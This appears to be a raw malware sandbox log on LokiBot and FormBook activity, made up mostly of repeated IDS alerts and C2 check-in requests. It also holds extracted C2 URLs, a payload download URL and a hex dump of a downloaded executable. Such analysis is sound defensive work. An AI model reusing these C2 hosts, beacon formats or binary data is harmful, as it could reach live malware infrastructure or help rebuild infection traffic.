            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.9:49794 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.9:49794 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.9:49794 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.9:49795 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.9:49795 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.9:49795 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.9:49795 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.9:49796 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.9:49796 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.9:49796 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.9:49796 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.9:49797 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.9:49797 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.9:49797 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.9:49797 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.9:49798 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.9:49798 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.9:49798 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.9:49798 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.9:49799 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.9:49799 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.9:49799 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.9:49799 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.9:49800 -> 91.195.240.19:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.9:49801 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.9:49801 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.9:49801 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.9:49801 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.9:49802 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.9:49802 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.9:49802 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.9:49802 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.9:49803 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.9:49803 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.9:49803 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.9:49803 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.9:49804 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.9:49804 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.9:49804 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.9:49804 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.9:49805 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.9:49805 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.9:49805 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.9:49805 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.9:49806 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.9:49806 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.9:49806 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.9:49806 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.9:49807 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.9:49807 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.9:49807 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.9:49807 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.9:49808 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.9:49808 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.9:49808 -> 45.61.137.215:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.9:49808 -> 45.61.137.215:80
            Source: Malware configuration extractorURLs: http://kbfvzoboss.bid/alien/fre.php
            Source: Malware configuration extractorURLs: http://alphastand.trade/alien/fre.php
            Source: Malware configuration extractorURLs: http://alphastand.win/alien/fre.php
            Source: Malware configuration extractorURLs: http://alphastand.top/alien/fre.php
            Source: Malware configuration extractorURLs: http://45.61.137.215/index.php/3b1tenbkyj
            Source: Malware configuration extractorURLs: www.sukhiclothing.com/dn03/
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 29 May 2024 13:42:07 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, Keep-AliveLast-Modified: Wed, 29 May 2024 07:28:27 GMTAccept-Ranges: bytesContent-Length: 616448Keep-Alive: timeout=5, max=100Content-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 df d7 56 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 50 09 00 00 16 00 00 00 00 00 00 1a 6e 09 00 00 20 00 00 00 80 09 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 09 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 c8 6d 09 00 4f 00 00 00 00 80 09 00 dc 13 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 09 00 0c 00 00 00 98 4f 09 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 20 4e 09 00 00 20 00 00 00 50 09 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 dc 13 00 00 00 80 09 00 00 14 00 00 00 52 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 a0 09 00 00 02 00 00 00 66 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fc 6d 09 00 00 00 00 00 48 00 00 00 02 00 05 00 94 54 00 00 9c 50 00 00 03 00 00 00 26 00 00 06 30 a5 00 00 68 aa 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7e 02 28 1f 00 00 0a 00 00 02 72 01 00 00 70 7d 01 00 00 04 02 72 01 00 00 70 7d 02 00 00 04 2a 1e 02 7b 01 00 00 04 2a 22 02 03 7d 01 00 00 04 2a 1e 02 7b 02 00 00 04 2a 22 02 03 7d 02 00 00 04 2a 00 00 13 30 02 00 51 00 00 00 00 00 00 00 02 16 7d 03 00 00 04 02 16 7d 04 00 00 04 02 72 01 00 00 70 7d 05 00 00 04 02 72 01 00 00 70 7d 06 00 00 04 02 73 01 00 00 06 7d 07 00 00 04 02 73 0e 00 00 06 7d 08 00 00 04 02 14 7d 09 00 00 04 02 28 20 00 00 0a 00 00 02 28 0d 00 00 06 00 2a 0a 00 2a 13 30 04 00 ad 00 00 00 01 00 00 11 00 02 7b 0a 00 00 04 6f 21 00 00 0a 0a 16 0b 02 7b 0a 00 00 04 6f 22 00 00 0a 06 6f 23 00 00 0a 6f 24 00 00 0a 0c 16 0d 2b 1c 00 08 09 6f 25 00 00 0a 1f 20 fe 01 13 04 11 04 2c 05 00 09 0b 2b 14 00 09 17 58 0d 09 08 6f 26 00 00 0a fe 04 13 05 11 05 2d d5 07 16 fe 01 13 06 11 06 2c 22 00 02 7b 07 00 00 04 08 6f 03 00 00 06 00 02 7b 07 00 00 04 72 01 00 00 70 6f 05 00 00 06 00 00 2b 2b 00 02 7b 07 00
            Source: global trafficHTTP traffic detected: GET /YLc7afPlL4RjCeK.exe HTTP/1.1Host: mbsngradnja.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /dn03/?KvOx3=URhw1ZwvIctTGCpPzcTqZFryLoAICCIR37RdTq+D27m0Ed9BTUTA8R/QfR+xv6khW63w&LhEx=ODKXZDVpY2w8gpmp HTTP/1.1Host: www.imdcaam.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /dn03/?KvOx3=rTguiTyPWe+LQ3wbOsvLrlRt5HkRD6mO+8zHcQ1TTPZ93ZKF8Svri6qQbYlnCi86X6wl&LhEx=ODKXZDVpY2w8gpmp HTTP/1.1Host: www.vivaness.clubConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /dn03/?KvOx3=JxIrrZbNPaA1C4PrhImOUNe+2n/09vmdrEF53puJ8yJ2Z/h/8YXf47jUpRM+pbGXlchT&LhEx=ODKXZDVpY2w8gpmp HTTP/1.1Host: www.servicepmgtl.worldConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /dn03/?KvOx3=z1cSYSgDw8EovxWDbEjrEjmudKiJC5ObQGBfFhSW6JRqxrcowHK672c/PJOQREkPG+UN&LhEx=ODKXZDVpY2w8gpmp HTTP/1.1Host: www.sukhiclothing.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /dn03/?KvOx3=JJyTLDumWHTBkarN0VPanW2WZHOeobli2nsK+rVOrq2yAp2byhlCx/KUbNmL9DZVQlbp&LhEx=ODKXZDVpY2w8gpmp HTTP/1.1Host: www.banditsolana.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /dn03/?KvOx3=GgD3Fcw+KScOn8zypM5BdJpW3iIUKLxhNIDvUm+FDOYyxu2AFxTq8ZqTICftVViamW1X&LhEx=ODKXZDVpY2w8gpmp HTTP/1.1Host: www.top-dao.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: Joe Sandbox ViewIP Address: 103.224.212.213 103.224.212.213
            Source: Joe Sandbox ViewIP Address: 45.61.137.215 45.61.137.215
            Source: Joe Sandbox ViewASN Name: UHGL-AS-APUCloudHKHoldingsGroupLimitedHK UHGL-AS-APUCloudHKHoldingsGroupLimitedHK
            Source: Joe Sandbox ViewASN Name: TRELLIAN-AS-APTrellianPtyLimitedAU TRELLIAN-AS-APTrellianPtyLimitedAU
            Source: Joe Sandbox ViewASN Name: AS40676US AS40676US
            Source: global trafficHTTP traffic detected: POST /index.php/3b1tenbkyj HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: DCC85916Content-Length: 172Connection: close
            Source: global trafficHTTP traffic detected: POST /index.php/3b1tenbkyj HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: DCC85916Content-Length: 172Connection: close
            Source: global trafficHTTP traffic detected: POST /index.php/3b1tenbkyj HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: DCC85916Content-Length: 145Connection: close
            Source: global trafficHTTP traffic detected: POST /index.php/3b1tenbkyj HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: DCC85916Content-Length: 145Connection: close
            Source: global trafficHTTP traffic detected: POST /index.php/3b1tenbkyj HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: DCC85916Content-Length: 145Connection: close
            Source: global trafficHTTP traffic detected: POST /index.php/3b1tenbkyj HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: DCC85916Content-Length: 145Connection: close
            Source: global trafficHTTP traffic detected: POST /index.php/3b1tenbkyj HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: DCC85916Content-Length: 145Connection: close
            Source: global trafficHTTP traffic detected: POST /index.php/3b1tenbkyj HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: DCC85916Content-Length: 145Connection: close
            Source: global trafficHTTP traffic detected: POST /index.php/3b1tenbkyj HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: DCC85916Content-Length: 145Connection: close
            Source: global trafficHTTP traffic detected: POST /index.php/3b1tenbkyj HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: DCC85916Content-Length: 145Connection: close
            Source: global trafficHTTP traffic detected: POST /index.php/3b1tenbkyj HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: DCC85916Content-Length: 145Connection: close
            Source: global trafficHTTP traffic detected: POST /index.php/3b1tenbkyj HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: DCC85916Content-Length: 145Connection: close
            Source: global trafficHTTP traffic detected: POST /index.php/3b1tenbkyj HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: DCC85916Content-Length: 145Connection: close
            Source: global trafficHTTP traffic detected: POST /index.php/3b1tenbkyj HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: DCC85916Content-Length: 145Connection: close
            Source: global trafficHTTP traffic detected: POST /index.php/3b1tenbkyj HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: DCC85916Content-Length: 145Connection: close
            Source: global trafficHTTP traffic detected: POST /index.php/3b1tenbkyj HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: DCC85916Content-Length: 145Connection: close
            Source: global trafficHTTP traffic detected: POST /index.php/3b1tenbkyj HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: DCC85916Content-Length: 145Connection: close
            Source: global trafficHTTP traffic detected: POST /index.php/3b1tenbkyj HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: DCC85916Content-Length: 145Connection: close
            Source: global trafficHTTP traffic detected: POST /index.php/3b1tenbkyj HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: DCC85916Content-Length: 145Connection: close
            Source: global trafficHTTP traffic detected: POST /index.php/3b1tenbkyj HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: DCC85916Content-Length: 145Connection: close
            Source: global trafficHTTP traffic detected: POST /index.php/3b1tenbkyj HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: DCC85916Content-Length: 145Connection: close
            Source: global trafficHTTP traffic detected: POST /index.php/3b1tenbkyj HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: DCC85916Content-Length: 145Connection: close
            Source: global trafficHTTP traffic detected: POST /index.php/3b1tenbkyj HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: DCC85916Content-Length: 145Connection: close
            Source: global trafficHTTP traffic detected: POST /index.php/3b1tenbkyj HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: DCC85916Content-Length: 145Connection: close
            Source: global trafficHTTP traffic detected: POST /index.php/3b1tenbkyj HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: DCC85916Content-Length: 145Connection: close
            Source: global trafficHTTP traffic detected: POST /index.php/3b1tenbkyj HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: DCC85916Content-Length: 145Connection: close
            Source: global trafficHTTP traffic detected: POST /index.php/3b1tenbkyj HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: DCC85916Content-Length: 145Connection: close
            Source: global trafficHTTP traffic detected: POST /index.php/3b1tenbkyj HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: DCC85916Content-Length: 145Connection: close
            Source: global trafficHTTP traffic detected: POST /index.php/3b1tenbkyj HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: DCC85916Content-Length: 145Connection: close
            Source: global trafficHTTP traffic detected: POST /index.php/3b1tenbkyj HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: DCC85916Content-Length: 145Connection: close
            Source: global trafficHTTP traffic detected: POST /index.php/3b1tenbkyj HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: DCC85916Content-Length: 145Connection: close
            Source: global trafficHTTP traffic detected: POST /index.php/3b1tenbkyj HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: DCC85916Content-Length: 145Connection: close
            Source: global trafficHTTP traffic detected: POST /index.php/3b1tenbkyj HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: DCC85916Content-Length: 145Connection: close
            Source: global trafficHTTP traffic detected: POST /index.php/3b1tenbkyj HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: DCC85916Content-Length: 145Connection: close
            Source: global trafficHTTP traffic detected: POST /index.php/3b1tenbkyj HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: DCC85916Content-Length: 145Connection: close
            Source: global trafficHTTP traffic detected: POST /index.php/3b1tenbkyj HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: DCC85916Content-Length: 145Connection: close
            Source: global trafficHTTP traffic detected: POST /index.php/3b1tenbkyj HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: DCC85916Content-Length: 145Connection: close
            Source: global trafficHTTP traffic detected: POST /index.php/3b1tenbkyj HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: DCC85916Content-Length: 145Connection: close
            Source: global trafficHTTP traffic detected: POST /index.php/3b1tenbkyj HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: DCC85916Content-Length: 145Connection: close
            Source: global trafficHTTP traffic detected: POST /index.php/3b1tenbkyj HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: DCC85916Content-Length: 145Connection: close
            Source: global trafficHTTP traffic detected: POST /index.php/3b1tenbkyj HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: DCC85916Content-Length: 145Connection: close
            Source: global trafficHTTP traffic detected: POST /index.php/3b1tenbkyj HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: DCC85916Content-Length: 145Connection: close
            Source: global trafficHTTP traffic detected: POST /index.php/3b1tenbkyj HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: DCC85916Content-Length: 145Connection: close
            Source: global trafficHTTP traffic detected: POST /index.php/3b1tenbkyj HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: DCC85916Content-Length: 145Connection: close
            Source: global trafficHTTP traffic detected: POST /index.php/3b1tenbkyj HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: DCC85916Content-Length: 145Connection: close
            Source: global trafficHTTP traffic detected: POST /index.php/3b1tenbkyj HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: DCC85916Content-Length: 145Connection: close
            Source: global trafficHTTP traffic detected: POST /index.php/3b1tenbkyj HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: DCC85916Content-Length: 145Connection: close
            Source: global trafficHTTP traffic detected: POST /index.php/3b1tenbkyj HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: DCC85916Content-Length: 145Connection: close
            Source: global trafficHTTP traffic detected: POST /index.php/3b1tenbkyj HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: DCC85916Content-Length: 145Connection: close
            Source: global trafficHTTP traffic detected: POST /index.php/3b1tenbkyj HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: DCC85916Content-Length: 145Connection: close
            Source: global trafficHTTP traffic detected: POST /index.php/3b1tenbkyj HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: DCC85916Content-Length: 145Connection: close
            Source: global trafficHTTP traffic detected: POST /index.php/3b1tenbkyj HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: DCC85916Content-Length: 145Connection: close
            Source: global trafficHTTP traffic detected: POST /index.php/3b1tenbkyj HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: DCC85916Content-Length: 145Connection: close
            Source: global trafficHTTP traffic detected: POST /index.php/3b1tenbkyj HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: DCC85916Content-Length: 145Connection: close
            Source: global trafficHTTP traffic detected: POST /index.php/3b1tenbkyj HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: DCC85916Content-Length: 145Connection: close
